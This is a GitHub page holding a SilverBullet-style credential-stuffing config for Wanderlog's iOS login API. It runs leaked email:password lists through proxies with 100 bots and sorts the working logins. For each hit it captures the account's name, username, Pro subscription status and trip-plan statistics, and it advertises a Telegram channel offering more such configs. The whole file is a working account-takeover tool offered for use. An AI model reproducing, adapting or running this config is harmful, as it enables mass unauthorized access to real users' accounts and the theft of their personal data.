-
Notifications
You must be signed in to change notification settings - Fork 1
/
Wanderlog iOS API.svb
141 lines (120 loc) · 4.49 KB
/
Wanderlog iOS API.svb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
[SETTINGS]
{
"Name": "Wanderlog iOS API",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2024-04-05T15:00:02.8439079+04:00",
"AdditionalInfo": "For more configs join us Telegram: https://t.me/configscombos2024",
"RequiredPlugins": [],
"Author": "🔥 @svbconfigmaker 🔥",
"Version": "1.1.3 [SB]",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "Default",
"DataRules": [],
"CustomInputs": [
{
"Description": "For more configs join us Telegram: https://t.me/configscombos2024",
"VariableName": "",
"Id": 839921130
}
],
"CaptchaUrl": "",
"IsBase64": false,
"FilterList": [],
"EvaluateMathOCR": false,
"SecurityProtocol": 0,
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"AcceptInsecureCertificates": true,
"DisableNotifications": false,
"DisableImageLoading": false,
"DefaultProfileDirectory": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": "",
"Title": "Wanderlog iOS API",
"IconPath": "Icon\\svbfile.ico",
"LicenseSource": null,
"Message": null,
"MessageColor": "#FFFFFFFF",
"HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
"AuthorColor": "#FFFFB266",
"WordlistColor": "#FFB5C2E1",
"BotsColor": "#FFA8FFFF",
"CustomInputColor": "#FFD6C7C7",
"CPMColor": "#FFFFFFFF",
"ProgressColor": "#FFAD93E3",
"HitsColor": "#FF66FF66",
"CustomColor": "#FFFFB266",
"ToCheckColor": "#FF7FFFD4",
"FailsColor": "#FFFF3333",
"RetriesColor": "#FFFFFF99",
"OcrRateColor": "#FF4698FD",
"ProxiesColor": "#FFFFFFFF"
}
[SCRIPT]
#LOGIN REQUEST POST "https://wanderlog.com/api/user/login"
CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"platform\":\"ios\",\"version\":\"2.122\",\"analytics\":{}}"
CONTENTTYPE "application/json"
HEADER "Host: wanderlog.com"
HEADER "Content-Type: application/json;charset=utf-8"
HEADER "Accept: application/json, text/plain, */*"
HEADER "User-Agent: wanderlog/2024032110 CFNetwork/1494.0.7 Darwin/23.4.0"
HEADER "X-Wl-Is-Mobile: 1"
HEADER "Accept-Language: en"
HEADER "Content-Length: 111"
HEADER "Accept-Encoding: gzip, deflate, br"
KEYCHECK
KEYCHAIN Failure OR
KEY "The password is incorrect"
KEY "\"success\":false"
KEYCHAIN Success OR
KEY "You have successfully signed in"
KEY "\"user\":{\"id\":"
PARSE "<SOURCE>" LR "\"user\":{\"id\":" "," -> VAR "uid"
PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username"
PARSE "<SOURCE>" LR "\"createdAt\":\"" "T" CreateEmpty=FALSE -> CAP "createdAt"
PARSE "<SOURCE>" LR "\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Name"
PARSE "<SOURCE>" LR "\"isProUser\":" "," CreateEmpty=FALSE -> CAP "isProUser"
PARSE "<SOURCE>" LR "\"clientLatestSubscription\":" "," CreateEmpty=FALSE -> CAP "Subscription"
#GET_TRIPLANS REQUEST GET "https://wanderlog.com/api/tripPlans/profile/<uid>"
HEADER "Host: wanderlog.com"
HEADER "Accept: application/json, text/plain, */*"
HEADER "X-Wl-User-Id: 4322623"
HEADER "If-None-Match: W/\"122-idBESjjyi/YJwvuyqrNzKGqF+cw\""
HEADER "X-Wl-Is-Mobile: 1"
HEADER "Accept-Language: en"
HEADER "User-Agent: wanderlog/2024032110 CFNetwork/1494.0.7 Darwin/23.4.0"
HEADER "Accept-Encoding: gzip, deflate, br"
KEYCHECK
KEYCHAIN Success OR
KEY "\"tripPlans\":[{\"id\":"
KEYCHAIN Custom "CUSTOM" OR
KEY "\"tripPlans\":null"
PARSE "<SOURCE>" JSON "numFollowedUsers" CreateEmpty=FALSE -> CAP "FollowedUsers"
PARSE "<SOURCE>" LR "\"numFollowingUsers\":" "}" CreateEmpty=FALSE -> CAP "FollowingUsers"
PARSE "<SOURCE>" LR "\"title\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "heroTripPlan"
PARSE "<SOURCE>" JSON "placeCount" CreateEmpty=FALSE -> CAP "Total Places"
PARSE "<SOURCE>" JSON "viewCount" CreateEmpty=FALSE -> CAP "Total Views"
PARSE "<SOURCE>" JSON "likeCount" CreateEmpty=FALSE -> CAP "Total Likes"
PARSE "<SOURCE>" LR "\"endDate\":\"" "\"" CreateEmpty=FALSE -> CAP "endDate"
#AUTHOR FUNCTION Constant "🔥 @svbconfigmaker 🔥" -> CAP "Config By "
KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Custom "FREE" OR
KEY "<isProUser>" Contains "false"
KEYCHAIN Success OR
KEY "<isProUser>" Contains "true"